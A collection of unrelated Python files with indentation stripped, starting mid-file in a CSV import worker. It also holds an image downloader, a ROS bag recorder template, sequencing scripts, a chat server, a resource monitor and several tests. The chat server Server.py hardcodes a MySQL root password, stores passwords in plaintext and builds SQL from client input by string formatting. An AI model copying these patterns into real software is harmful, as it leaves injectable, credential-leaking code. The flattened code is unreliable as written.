rows = list(csv.reader(chunk['rows'], **self.dialect_options))
errors = defaultdict(list)
def convert_row(r):
try:
return conv.convert_row(r)
except Exception as err:
errors[err.message if hasattr(err, 'message') else str(err)].append(r)
return None
converted_rows = [_f for _f in [convert_row(r) for r in rows] if _f]
if errors:
for msg, rows in errors.items():
self.report_error(ParseError(msg), chunk, rows)
return converted_rows
def maybe_inject_failures(self, batch):
"""
Examine self.test_failures and see if the batch is a batch
supposed to cause a failure (failing_batch), or to terminate the worker process
(exit_batch), or not to be sent (unsent_batch).
@return any statement that will cause a failure or None if the statement should not be sent
plus a boolean indicating if a failure should be applied at all
"""
if 'failing_batch' in self.test_failures:
failing_batch = self.test_failures['failing_batch']
if failing_batch['id'] == batch['id']:
if batch['attempts'] < failing_batch['failures']:
statement = SimpleStatement("INSERT INTO badtable (a, b) VALUES (1, 2)",
consistency_level=self.consistency_level)
return statement, True # use this statement, which will cause an error
if 'exit_batch' in self.test_failures:
exit_batch = self.test_failures['exit_batch']
if exit_batch['id'] == batch['id']:
sys.exit(1)
if 'unsent_batch' in self.test_failures:
unsent_batch = self.test_failures['unsent_batch']
if unsent_batch['id'] == batch['id']:
return None, True # do not send this batch, which will cause missing acks in the parent process
return None, False # carry on as normal, do not apply any failures
@staticmethod
def make_batch(batch_id, rows, attempts=1):
return {'id': batch_id, 'rows': rows, 'attempts': attempts}
def split_into_batches(self, chunk, conv, tm):
"""
Batch rows by ring position or replica.
If there are at least min_batch_size rows for a ring position then split these rows into
groups of max_batch_size and send a batch for each group, using all replicas for this ring position.
Otherwise, we are forced to batch by replica, and here unfortunately we can only choose one replica to
guarantee common replicas across partition keys. We are typically able
to batch by ring position for small clusters or when VNODES are not used. For large clusters with VNODES
it may not be possible, in this case it helps to increase the CHUNK SIZE but up to a limit, otherwise
we may choke the cluster.
"""
rows_by_ring_pos = defaultdict(list)
errors = defaultdict(list)
min_batch_size = self.min_batch_size
max_batch_size = self.max_batch_size
ring = tm.ring
get_row_partition_key_values = conv.get_row_partition_key_values_fcn()
pk_to_token_value = tm.pk_to_token_value
get_ring_pos = tm.get_ring_pos
make_batch = self.make_batch
for row in chunk['rows']:
try:
pk = get_row_partition_key_values(row)
rows_by_ring_pos[get_ring_pos(ring, pk_to_token_value(pk))].append(row)
except Exception as e:
errors[e.message if hasattr(e, 'message') else str(e)].append(row)
if errors:
for msg, rows in errors.items():
self.report_error(ParseError(msg), chunk, rows)
replicas = tm.replicas
filter_replicas = tm.filter_replicas
rows_by_replica = defaultdict(list)
for ring_pos, rows in rows_by_ring_pos.items():
if len(rows) > min_batch_size:
for i in range(0, len(rows), max_batch_size):
yield filter_replicas(replicas[ring_pos]), make_batch(chunk['id'], rows[i:i + max_batch_size])
else:
# select only the first valid replica to guarantee more overlap or none at all
rows_by_replica[tuple(filter_replicas(replicas[ring_pos])[:1])].extend(rows) # TODO: revisit tuple wrapper
# Now send the batches by replica
for replicas, rows in rows_by_replica.items():
for i in range(0, len(rows), max_batch_size):
yield replicas, make_batch(chunk['id'], rows[i:i + max_batch_size])
def result_callback(self, _, batch, chunk):
self.update_chunk(batch['rows'], chunk)
def err_callback(self, response, batch, chunk, replicas):
if isinstance(response, OperationTimedOut) and chunk['imported'] == chunk['num_rows_sent']:
return # occasionally the driver sends false timeouts for rows already processed (PYTHON-652)
err_is_final = batch['attempts'] >= self.max_attempts
self.report_error(response, chunk, batch['rows'], batch['attempts'], err_is_final)
if not err_is_final:
batch['attempts'] += 1
statement = self.make_statement(self.query, self.conv, chunk, batch, replicas)
future = self.session.execute_async(statement)
future.add_callbacks(callback=self.result_callback, callback_args=(batch, chunk),
errback=self.err_callback, errback_args=(batch, chunk, replicas))
def report_error(self, err, chunk=None, rows=None, attempts=1, final=True):
if self.debug and sys.exc_info()[1] == err:
traceback.print_exc()
err_msg = err.message if hasattr(err, 'message') else str(err)
self.outmsg.send(ImportTaskError(err.__class__.__name__, err_msg, rows, attempts, final))
if final and chunk is not None:
self.update_chunk(rows, chunk)
def update_chunk(self, rows, chunk):
chunk['imported'] += len(rows)
if chunk['imported'] == chunk['num_rows_sent']:
self.outmsg.send(ImportProcessResult(chunk['num_rows_sent']))
class RateMeter(object):
def __init__(self, log_fcn, update_interval=0.25, log_file=''):
self.log_fcn = log_fcn # the function for logging, may be None to disable logging
self.update_interval = update_interval # how often we update in seconds
self.log_file = log_file # an optional file where to log statistics in addition to stdout
self.start_time = time.time() # the start time
self.last_checkpoint_time = self.start_time # last time we logged
self.current_rate = 0.0 # rows per second
self.current_record = 0 # number of records since we last updated
self.total_records = 0 # total number of records
if os.path.isfile(self.log_file):
os.unlink(self.log_file)
def increment(self, n=1):
self.current_record += n
self.maybe_update()
def maybe_update(self, sleep=False):
if self.current_record == 0:
return
new_checkpoint_time = time.time()
time_difference = new_checkpoint_time - self.last_checkpoint_time
if time_difference >= self.update_interval:
self.update(new_checkpoint_time)
self.log_message()
elif sleep:
remaining_time = time_difference - self.update_interval
if remaining_time > 0.000001:
time.sleep(remaining_time)
def update(self, new_checkpoint_time):
time_difference = new_checkpoint_time - self.last_checkpoint_time
if time_difference >= 1e-09:
self.current_rate = self.get_new_rate(self.current_record / time_difference)
self.last_checkpoint_time = new_checkpoint_time
self.total_records += self.current_record
self.current_record = 0
def get_new_rate(self, new_rate):
"""
return the rate of the last period: this is the new rate but
averaged with the last rate to smooth a bit
"""
if self.current_rate == 0.0:
return new_rate
else:
return (self.current_rate + new_rate) / 2.0
def get_avg_rate(self):
"""
return the average rate since we started measuring
"""
time_difference = time.time() - self.start_time
return self.total_records / time_difference if time_difference >= 1e-09 else 0
def log_message(self):
if not self.log_fcn:
return
output = 'Processed: %d rows; Rate: %7.0f rows/s; Avg. rate: %7.0f rows/s\r' % \
(self.total_records, self.current_rate, self.get_avg_rate())
self.log_fcn(output, eol='\r')
if self.log_file:
with open(self.log_file, "a") as f:
f.write(output + '\n')
def get_total_records(self):
self.update(time.time())
self.log_message()
return self.total_records
|
image_utils.py
|
import io
import requests
from PIL import Image
from utils_all.utils_all import *
import threading
thread_pools=[]
from PIL import ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True # important to avoid
def download_images(img_urls,save_files,size=(512,512), no_threads=6):
for i in range(len(img_urls)):
while(True):
img_url=img_urls[i]
save_file=save_files[i]
t=threading.Thread(target=download_image, args=(img_url,save_file,size,len(img_urls),(i+1)))
if len(thread_pools)<no_threads:
t.start()
thread_pools.append(save_file)
break
def download_image(img_url,save_file,size,total=None, progress=None):
try:
if os.path.exists(save_file):
img=Image.open(save_file)
if img is not None:
thread_pools.remove(save_file)
# shutil.copy(save_file,os.path.join('/media/milton/ssd1/research/competitions/ISIC_2018_data/data/aditional_training_data/MEL', os.path.basename(save_file)))
return
except Exception as e:
pass
progress_bar(progress,total,"Downloaded: {}".format(save_file))
r = requests.get(img_url)
if r.status_code != requests.codes.ok:
assert False, 'Status code error: {}.'.format(r.status_code)
with Image.open(io.BytesIO(r.content)) as img:
img = img.convert('RGB')
img.save(save_file, quality=100)
img1 = Image.open(save_file)
img1.resize(size)
img1.save(save_file)
thread_pools.remove(save_file)
|
ROSBagAPIThreadRecorder.tpl.py
|
{% block meta %}
name: ROSBagAPIThreadRecorder
description: >
SMACH template that provides a ROSBagAPIThreadRecorder helper class for
RecordROSBagState. It uses the rosbag API (application programming interface)
as well as the threading library in order to manage multiple recording
threads. NOTE: this means that this recorder may have issues with the Python
GIL (global interpreter lock) when other threads (e.g. MoveIt! commands)
block execution.
Based in part on code from:
https://github.com/francisc0garcia/sensor_board/blob/master/src/classes/bags/recorder.py
language: Python
framework: SMACH
type: None
tags: [core]
includes: []
extends: []
variables: []
input_keys: []
output_keys: []
{% endblock meta %}
{% from "Utils.tpl.py" import import_module, from_import %}
{% block imports %}
{{ import_module(defined_headers, 'rospy') }}
{{ import_module(defined_headers, 'rosbag') }}
{{ import_module(defined_headers, 'roslib') }}
{{ import_module(defined_headers, 'rosgraph') }}
{{ import_module(defined_headers, 'threading') }}
{% if 'import_Queue' not in defined_headers %}
try:
from queue import Queue
except ImportError:
from Queue import Queue
{% do defined_headers.append('import_Queue') %}
{% endif %}
{% endblock imports %}
{% block class_defs %}
{% if 'class_ROSBagAPIThreadRecorder' not in defined_headers %}
class ROSBagAPIThreadRecorder(object):
"""A rosbag recorder class that uses the rosbag API (application
programming interface) as well as the threading library in order to manage
multiple recording threads. NOTE: this means that this recorder may have
issues with the Python GIL (global interpreter lock) when other threads (e.g.
MoveIt! commands) block execution.
"""
def __init__(self):
# Get a reference to the ROS master
self._master = rosgraph.Master('rosbag_recorder_observer')
# A dict of bag master check threads indexed by bag filenames
self._master_check_threads = dict()
# The rate at which to poll the ROS master for new topics
self._master_check_interval = 0.1
# A dict of rosbags indexed by filenames
self._bags = dict()
# A dict of bag writing threads indexed by bag filenames
self._write_threads = dict()
# A dict of bag writing queues indexed by bag filenames
self._write_queues = dict()
# A dict of bag writing stop flags indexed by bag filenames
self._stop_flags = dict()
# A dict of bag thread stop conditions indexed by bag filenames
self._stop_conditions = dict()
# A dict of bag file locks indexed by bag filenames
self._bag_locks = dict()
# A dict of dicts of subscribers indexed by bag_files and topics
# respectively
self._bag_subs = dict()
# Length of timeout (in seconds), as well as sleep rate, for waiting
# for the threads to finish writing before forcibly closing a bag.
self._bag_close_timeout = 10.0
self._bag_close_sleep_rate = 100.0
def _write_cb(self, msg, args):
bag_file = args[0]
topic = args[1]
msg_class = args[2]
try:
self._write_queues[bag_file].put((topic, msg, rospy.get_rostime()))
except Exception as e:
rospy.logwarn('Failed to write message of type {} from topic {} to rosbag {}: {}'.format(msg_class, topic, bag_file, repr(e)))
pass
def _run_master_check_thread(self, bag_file, topics):
# Set up an observer loop
try:
while not self._stop_flags[bag_file]:
# Get a list of topics currently being published
currently_published_topics = []
try:
currently_published_topics = self._master.getPublishedTopics('')
except Exception as e:
# TODO: Allow this warning to be included if a
# debug/verbosity flag is passed to the state.
# rospy.logwarn('Failed to get list of currently published topics from ROS master: {}'.format(repr(e)))
pass
# Check for new topics
for topic, msg_type in currently_published_topics:
# If the topic has previously been subscribed to for this
# bag_file, or is not listed as a topic for this bag_file,
# skip it.
if topic in list(self._bag_subs[bag_file].keys()) or (topic not in topics and topic.strip('/') not in topics):
continue
# Subscribe to the topic
try:
msg_class = roslib.message.get_message_class(msg_type)
self._bag_subs[bag_file][topic] = rospy.Subscriber(topic, msg_class, self._write_cb, (bag_file, topic, msg_class))
except Exception as e:
self._unsubscribe_bag_topics(bag_file)
self._close_bag(bag_file)
raise ValueError('Failed to subscribe to topic {}: {}'.format(topic, repr(e)))
# Wait a while
self._stop_conditions[bag_file].acquire()
self._stop_conditions[bag_file].wait(self._master_check_interval)
except Exception as e:
rospy.logerr('Error when recording rosbag file {}: {}'.format(bag_file, repr(e)))
# Unsubscribe from topics and close bag
self._unsubscribe_bag_topics(bag_file)
self._close_bag(bag_file)
def _unsubscribe_bag_topics(self, bag_file):
for _, sub in self._bag_subs[bag_file].items():
try:
sub.unregister()
except Exception as e:
rospy.logerr('Failed to unregister topic subscriber {} while stopping rosbag recording with filename \'{}\': {}'.format(sub, bag_file, repr(e)))
raise
del self._bag_subs[bag_file]
def _close_bag(self, bag_file):
try:
with self._bag_locks[bag_file]:
self._bags[bag_file].close()
except Exception as e:
rospy.logerr('Failed to close rosbag with filename \'{}\': {}'.format(bag_file, repr(e)))
raise
del self._bags[bag_file]
def _run_write_thread(self, bag_file):
try:
while not self._stop_flags[bag_file]:
# Wait for a message
item = self._write_queues[bag_file].get()
if item == self:
continue
topic, msg, t = item
# Write to the bag
with self._bag_locks[bag_file]:
self._bags[bag_file].write(topic, msg, t)
except Exception as e:
rospy.logerr('Error when writing to rosbag file {}: {}'.format(bag_file, repr(e)))
def start(self, bag_file, topics):
"""Start a rosbag recording.
"""
# Open the bag file for writing
try:
assert(bag_file not in self._bags.keys())
self._bags[bag_file] = rosbag.Bag(bag_file, 'w')
self._bag_subs[bag_file] = dict()
except Exception as e:
rospy.logerr('Failed to start rosbag recording with filename \'{}\': {}'.format(bag_file, repr(e)))
return 'aborted'
# Set up the bag writing queue
self._write_queues[bag_file] = Queue()
# Set the bag thread lock, write stopping flag, and thread stopping conditions
self._bag_locks[bag_file] = threading.Lock()
self._stop_flags[bag_file] = False
self._stop_conditions[bag_file] = threading.Condition()
# Spin up the master check and bag writing threads
self._master_check_threads[bag_file] = threading.Thread(target=self._run_master_check_thread, args=[bag_file, topics])
self._write_threads[bag_file] = threading.Thread(target=self._run_write_thread, args=[bag_file])
self._master_check_threads[bag_file].start()
self._write_threads[bag_file].start()
return 'succeeded'
def stop(self, bag_file):
"""Stop a rosbag recording.
"""
# Signal threads to stop bag recording
with self._stop_conditions[bag_file]:
self._stop_flags[bag_file] = True
self._stop_conditions[bag_file].notify_all()
# Signal the bag write thread to stop writing
self._write_queues[bag_file].put(self)
# Wait for the bag to be closed
t = rospy.get_time()
r = rospy.Rate(self._bag_close_sleep_rate)
while bag_file in list(self._bags.keys()):
if rospy.get_time() - t < self._bag_close_timeout:
r.sleep()
else:
break
else:
return 'succeeded'
# If the bag is still open, issue a warning and attempt forced closure.
rospy.logwarn('Warning: timeout exceeded for stopping writing to rosbag file {}. Attempting forced stop...'.format(bag_file))
try:
self._unsubscribe_bag_topics(bag_file)
self._close_bag(bag_file)
except Exception as e:
rospy.logerr('Error during forced stop of writing to rosbag file {}: {}'.format(bag_file, repr(e)))
return 'aborted'
return 'succeeded'
def stop_all(self):
"""Stop all rosbag recordings.
"""
# Stop all current recordings
for bag_file in list(self._bags.keys()):
if self.stop(bag_file) != 'succeeded':
return 'aborted'
return 'succeeded'
{% do defined_headers.append('class_ROSBagAPIThreadRecorder') %}{% endif %}
{% endblock class_defs %}
|
ben_test.py
|
import os
from ont_fast5_api.fast5_interface import get_fast5_file
from ont_fast5_api.analysis_tools.basecall_1d import Basecall1DTools
import time
from multiprocessing import Pool, Process
from joblib import Parallel, delayed
def fast5s_to_fastq(dir_):
print(dir_)
start = time.time()
plus = '+'
fastq_fn = os.path.join(os.path.join(dir_), os.path.basename(dir_) + '.fastq')
fast5s = [os.path.join(dir_ ,x) for x in os.listdir(dir_) if x.endswith('.fast5') ]
n = []
s = []
q = []
for fast5_fn in fast5s:
with get_fast5_file(fast5_fn, mode='r') as f5:
with Basecall1DTools(f5) as basecall:
n1, s1, q1 = basecall.get_called_sequence('template')
n.append(n1)
s.append(s1)
q.append(q1)
with open(fastq_fn, mode='w') as fastq_fh:
for (n1, s1, q1) in zip(n, s, q):
print('@%s' % n1, file=fastq_fh)
print(s1, file=fastq_fh)
print(plus, file=fastq_fh)
print(q1, file=fastq_fh)
string = '%s done' % fastq_fn
stop = time.time()
string = string + ': Done in {:.2f}'.format(stop - start)
print(string)
return string
if __name__ == '__main__':
BAMIN_DIR = '../../analyses/mapping/infected_leaves/infected_leaves_2/'
FAST5IN_DIR = '../../data/genomic_data/infected_leaves/workspace_fast5/infected_leaves_2_fast5_out/'
FAST5singleIN_DIR = '../../analyses/single_fast5s/infected_leaves/infected_leaves_2_fast5_single_fast5/'
OUT_DIR = '../../analyses/single_fast5s/infected_leaves/infected_leaves_2_mapped_single_fast5/'
n_threads = 10
BAMIN_DIR = os.path.abspath(BAMIN_DIR)
FAST5IN_DIR = os.path.abspath(FAST5IN_DIR)
OUT_DIR = os.path.abspath(OUT_DIR)
FAST5singleIN_DIR = os.path.abspath(FAST5singleIN_DIR)
single_fast5_count = 0
dirs = []
for direcotry in (os.path.join(FAST5singleIN_DIR, x) for x in os.listdir(FAST5singleIN_DIR) if os.path.isdir(os.path.join(FAST5singleIN_DIR, x))):
dirs.append(direcotry)
fast5s = [os.path.join(direcotry ,x) for x in os.listdir(direcotry) if x.endswith('.fast5')]
single_fast5_count += len(fast5s)
dirs.sort()
print('This is the amount of single fast5s %s' % single_fast5_count)
print(len(dirs))
#for i in range(len(dirs)):
#p = Process(target=fast5s_to_fastq, args=(dirs[0]))
#p.start()
#p.join()
#exit()
# with Pool(processes=n_threads) as pool:
#pool.map(fast5s_to_fastq, dirs)
exit()
while dirs:
with Pool(processes=n_threads) as pool:
pool.map(fast5s_to_fastq, dirs)
for dir_ in (os.path.join(FAST5singleIN_DIR, x) for x in os.listdir(FAST5singleIN_DIR) if os.path.isdir(os.path.join(FAST5singleIN_DIR, x))):
if os.path.exists(os.path.join(os.path.join(dir_), os.path.basename(dir_) + '.fastq')):
dirs.remove(dir_)
print('So many dirs to go %s' % len(dirs))
exit()
for x in (Parallel(n_jobs=n_threads)(delayed(fast5s_to_fastq)(x) for x in dirs)):
print(x)
|
Server.py
|
'''
author: ywxk
target: realize the features of chat
2017.11.14
'''
import sys
import time
import socket
import pymysql
import threading
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
addr = ("127.0.0.1", 3300)
class Link:
# 初始化TCP
onlines = 0
usersname = [] # 在线好友名字
userssock = {} # 在线好友地址
def __init__(self, addr, db):
self.db = db
self.sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # 地址复用
self.sk.bind(addr)
self.sk.listen(1000)
self.isrun = True # 线程控制
t = threading.Thread(target=self.LoopListen)
t.start()
# 线程监听
def LoopListen(self):
print('正在监听……')
while self.isrun:
sock, addr = self.sk.accept()
t = threading.Thread(target=self.line, args=(sock, addr))
t.start()
# 处理子线程
def line(self, sock, addr):
while self.isrun:
try:
data = sock.recv(1024).decode('utf-8')
# 判断是否下线
if data == '$$END$$':
self.offline()
break
# 添加用户信息
elif data.find('$$INFO') != -1:
print('终端发来用户信息')
self.dealinfo(data, sock)
# 转发消息
else:
dataitem = data.split('$')
name1 = dataitem[0]
name2 = dataitem[1]
mess = dataitem[2]
print(name2 + '发给' + name1 + ':' + mess)
self.userssock[name1].send(data.encode('utf-8'))
except:
print('交换信息故障')
self.offline()
break
def dealinfo(self, data, sock):
info = data.split(',')
name = info[1]
keyword = info[2]
aim = info[3]
if aim == 'Login':
if name in self.usersname:
sock.send('$$USERAT'.encode('utf-8'))
print('存在用户冲突')
return False
if name not in self.db.namekey:
sock.send('$$UNREG'.encode('utf-8'))
print('该用户未注册')
return False
if keyword != self.db.namekey[name]:
sock.send('$$KEYERR'.encode('utf-8'))
print('密码不匹配')
return False
elif aim == 'Regis':
if name in self.db.namekey:
sock.send('$$USERAT'.encode('utf-8'))
print('该昵称已存在')
return False
else:
userdata = (name, keyword, 'None')
print('数据库写入……')
self.db.insert_datarow(userdata)
print('数据库写入成功')
# 上线处理
self.online(name, sock)
return True
# 下线处理
def offline(self):
if self.onlines != 0:
self.onlines -= 1
name = self.usersname.pop()
print('%s已下线' % name)
self.userssock.pop(name) # 更新列表
# 通知删除
data = '$$DEL:' + name
for user in self.usersname:
self.userssock[user].send(data.encode('utf-8'))
# 上线处理
def online(self, name, sock):
self.onlines += 1
data = '$$ADD:' + name # 通知添加列表
for user in self.usersname:
self.userssock[user].send(data.encode('utf-8'))
print(name + '已上线')
self.namelist_send(sock)
self.usersname.append(name)
self.userssock[name] = sock
# 发送列表
def namelist_send(self, sock):
print('递送在线名单')
sock.send('$$LIST'.encode('utf-8'))
for item in self.usersname:
print('正在发送:' + item)
sock.send(str(item).encode('utf-8'))
time.sleep(0.01)
sock.send('$$END'.encode('utf-8'))
# 数据库连接
class Database:
namekey = {}
# 连接数据库
def __init__(self):
self.db = pymysql.connect(host='127.0.0.1', port=3306,
user='root', passwd='ywxkgdw', db='chat')
self.cursor = self.db.cursor()
self.regrenew()
def get_table_data(self):
self.cursor.execute('SELECT * FROM users')
results = self.cursor.fetchall()
self.db.commit()
return results
def insert_datarow(self, datalist):
sql = 'insert into users values(1,"%s","%s","%s")'
self.cursor.execute(sql % datalist)
self.db.commit()
self.namekey[datalist[0]] = datalist[1]
def regrenew(self):
listdata = self.get_table_data()
for data in listdata:
self.namekey[data[1]] = data[2]
return self.namekey
# 构建窗口
class Box(QWidget):
def __init__(self):
super().__init__()
self.BoxInit()
# 初始化窗口
def BoxInit(self):
self.resize(700, 500)
self.setFixedSize(self.width(), self.height())
self.setWindowTitle('Vortex Host')
# 设置表格
grid = QGridLayout()
self.delbtn = QPushButton('删除')
self.fixbtn = QPushButton('修改')
self.listview = QTableWidget(0, 4)
self.listview.setHorizontalHeaderLabels(
['ID', 'Name', 'KeyWord', 'IP'])
self.listview.horizontalHeader().setStretchLastSection(True) # 自适应窗口
grid.addWidget(self.listview, 0, 0, 1, 2)
grid.addWidget(self.delbtn, 1, 0)
grid.addWidget(self.fixbtn, 1, 1)
self.setLayout(grid)
qr = self.frameGeometry()
cp = QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
self.move(qr.topLeft())
self.show()
# 更新在线列表
def listview_init(self, listdata):
self.listrow = 0
for row in listdata:
self.listview.setRowCount(self.listrow + 1)
for item in range(4):
newItem = QTableWidgetItem(str(row[item]))
self.listview.setItem(self.listrow, item, newItem)
self.listrow += 1
# 添加一行显示
def add_datarow(self, listdata):
self.listview.setRowCount(self.listrow + 1)
for item in range(4):
newItem = QTableWidgetItem(str(listdata[item]))
self.listview.setItem(self.listcol, item, newItem)
self.listrow += 1
# 删除一行显示
def sub_datarow(self, listdata):
pass
# 主函数
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = Box()
dbdata = Database()
link = Link(addr, dbdata)
results = dbdata.get_table_data()
ex.listview_init(results)
sys.exit(app.exec_())
|
resource_monitor.py
|
# Copyright (c) Peng Cheng Laboratory
# All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
# to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import socket
import argparse
import time
import multiprocessing
import psutil
import os
#run_time = 24
net_interval = 30
dev_interval = 30
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('--id',type=str,required = True,help="experiment id")
return parser.parse_args()
def test_record_device_info(experiment_id):
count = 0
while True:
count+=1
with open('/root/' + experiment_id,'a+') as f:
f.write(str(count)+'\n')
time.sleep(2)
def record_net_info():
u_before = psutil.net_io_counters().bytes_sent
d_before = psutil.net_io_counters().bytes_recv
def get_send(u_before):
u_now = psutil.net_io_counters().bytes_sent
upload = (u_now - u_before)
u_before = u_now
return upload,u_before
def get_recv(d_before):
d_now = psutil.net_io_counters().bytes_recv
download = (d_now - d_before)
d_before = d_now
return download,d_before
#while((time.time() - start_time)/3600 < run_time):
while True:
upload,u_before = get_send(u_before)
download,d_before = get_recv(d_before)
f=open(log_path + '/net_info.csv','a+')
f.write(str(upload) + ',' + str(download) + '\n')
f.close()
time.sleep(net_interval)
def write_file(path,content):
record_file = open(path,'a+')
record_file.write(content + '\n')
record_file.close()
def record_device_info():
#while((time.time() - start_time)/3600 < run_time):
while True:
cpu_core_context =str(psutil.cpu_percent(interval=1, percpu=True))
write_file(log_path + '/cpu_core_info.csv',cpu_core_context)
cpu = os.popen("export TERM=linux && top -bn 1|grep Cpu\(s\)|awk '{print $2}'").readline().strip()
write_file(log_path + '/cpu_info.csv',cpu)
mem = psutil.virtual_memory()
write_file(log_path + '/mem_info.csv',str(mem.used/1024/1024)) #M
gpu = os.popen("nvidia-smi dmon -c 1 -s u|awk '{if($1 ~ /^[0-9]+$/){print $1,$2,$3}}'").readlines()
for i in gpu:
file_name = str(i.strip().split(' ')[0]) + '.csv'
content = str(','.join((i.strip().split(' ')[1],i.strip().split(' ')[2])))
write_file(log_path + '/' + file_name,content)
time.sleep(dev_interval)
def socket_client(s,server_ip):
try:
while True:
print(server_ip)
s.sendto(b'give me experment id',(server_ip, 7777))
ping = s.recv(1024).decode('utf-8')
time.sleep(5)
except Exception as e:
s.close
print(e)
dev_p.multiprocessing.Process(signal.SIGINT)
net_p.multiprocessing.Process(signal.SIGINT)
exit(1)
if __name__ == "__main__":
args = get_args()
experiment_id = args.id
log_path = '/root/mountdir/device_info/' + experiment_id + '/' + os.environ['SLURMD_NODENAME']
if not os.path.isdir(log_path):
os.makedirs(log_path)
start_date = os.popen('date').readline().strip()
write_file(log_path + '/time',start_date)
start_time = time.time()
dev_p = multiprocessing.Process(target=record_device_info)
dev_p.start()
net_p = multiprocessing.Process(target = record_net_info)
net_p.start()
dev_p.join()
net_p.join()
|
lab11_e.py
|
from asyncio.windows_events import NULL
from sys import setrecursionlimit
import threading
setrecursionlimit(10 ** 9)
threading.stack_size(3 * 67108864)
def main():
inf = 10 ** 9
#Ford-Bellman algo https://e-maxx.ru/algo/negative_cycle
file_input, file_output = open('negcycle.in', 'r'), open('negcycle.out','w')
n = int(file_input.readline())
weight_map, matrix, negcycle = [0] * n, [], [None] * n
for i in range(n):
current = list(map(int, file_input.readline().split()))
# concurrent = []
for j in range(n):
if current[j] != inf: matrix.append([i, j, current[j]])
# matrix[i] = concurrent
# del concurrent
flag = None
for i in range(n):
for j in range(len(matrix)):
if weight_map[matrix[j][1]] > matrix[j][2] + weight_map[matrix[j][0]]:
negcycle[matrix[j][1]], flag = matrix[j][:2]
weight_map[matrix[j][1]] = matrix[j][2] + weight_map[matrix[j][0]]
if flag is None: break
if flag is not None:
all_flag = flag
for _ in range(n): all_flag = negcycle[all_flag]
all_negcycle = []
iter = all_flag
while 1:
all_negcycle.append(iter)
iter = negcycle[iter]
if all_flag == iter: break
all_negcycle.append(all_flag)
all_negcycle = all_negcycle[::-1]
print('YES', len(all_negcycle), sep = '\n', file=file_output)
print(*[vertex + 1 for vertex in all_negcycle], file=file_output)
else: print('NO', file=file_output)
file_output.close()
thread = threading.Thread(target=main)
thread.start()
|
__init__.py
|
from __future__ import unicode_literals
import threading
import logging
from functools import wraps
from tests import TestCase as BaseTestCase
from werkzeug.serving import make_server
from flask import g, session, redirect
from catsnap.web import app
from nose.tools import nottest
from splinter import Browser
from splinter.exceptions import ElementDoesNotExist
from selenium.webdriver.remote.remote_connection import LOGGER
web_actors = {}
class TestCase(BaseTestCase):
def setUp(self):
super(TestCase, self).setUp()
self.browser = web_actors['browser']
def tearDown(self):
try:
self.visit_url('/logout')
finally:
super(TestCase, self).tearDown()
def visit_url(self, path):
self.browser.visit('http://localhost:65432' + path)
class App(object):
def __init__(self):
self.app = app
def start(self):
self.server = make_server('0.0.0.0', 65432, self.app)
self.server.serve_forever()
def stop(self):
if hasattr(self, 'server'):
self.server.shutdown()
def setUpPackage():
test_app = App()
thread = threading.Thread(target=test_app.start)
thread.daemon = True
thread.start()
web_actors['server'] = test_app
web_actors['browser'] = Browser()
LOGGER.setLevel(logging.WARNING)
def tearDownPackage():
web_actors['browser'].quit()
web_actors['server'].stop()
@nottest
@app.route('/become_logged_in')
def become_logged_in():
g.user = 1
session['logged_in'] = True
return redirect('/')
@nottest
@app.before_request
def indicate_test_server():
g.test_server = True
@nottest
def logged_in(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
web_actors['browser'].visit('http://localhost:65432/become_logged_in')
fn(*args, **kwargs)
return wrapper
|
test_capture_http_proxy.py
|
from warcio.capture_http import capture_http
import threading
from wsgiref.simple_server import make_server, WSGIServer
import time
import requests
from warcio.archiveiterator import ArchiveIterator
from pytest import raises
# ==================================================================
class TestCaptureHttpProxy():
def setup(cls):
def app(env, start_response):
result = ('Proxied: ' + env['PATH_INFO']).encode('utf-8')
headers = [('Content-Length', str(len(result)))]
start_response('200 OK', headers=headers)
return iter([result])
from wsgiprox.wsgiprox import WSGIProxMiddleware
wsgiprox = WSGIProxMiddleware(app, '/')
class NoLogServer(WSGIServer):
def handle_error(self, request, client_address):
pass
server = make_server('localhost', 0, wsgiprox, server_class=NoLogServer)
addr, cls.port = server.socket.getsockname()
cls.proxies = {'https': 'localhost:' + str(cls.port),
'http': 'localhost:' + str(cls.port)
}
def run():
try:
server.serve_forever()
except Exception as e:
print(e)
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.1)
def test_capture_http_proxy(self):
with capture_http() as warc_writer:
res = requests.get("http://example.com/test", proxies=self.proxies, verify=False)
ai = ArchiveIterator(warc_writer.get_stream())
response = next(ai)
assert response.rec_type == 'response'
assert response.rec_headers['WARC-Target-URI'] == "http://example.com/test"
assert response.content_stream().read().decode('utf-8') == 'Proxied: /http://example.com/test'
assert response.rec_headers['WARC-Proxy-Host'] == 'http://localhost:{0}'.format(self.port)
request = next(ai)
assert request.rec_type == 'request'
assert request.rec_headers['WARC-Target-URI'] == "http://example.com/test"
assert request.rec_headers['WARC-Proxy-Host'] == 'http://localhost:{0}'.format(self.port)
with raises(StopIteration):
assert next(ai)
def test_capture_https_proxy(self):
with capture_http() as warc_writer:
res = requests.get("https://example.com/test", proxies=self.proxies, verify=False)
res = requests.get("https://example.com/foo", proxies=self.proxies, verify=False)
# not recording this request
res = requests.get("https://example.com/skip", proxies=self.proxies, verify=False)
with capture_http(warc_writer):
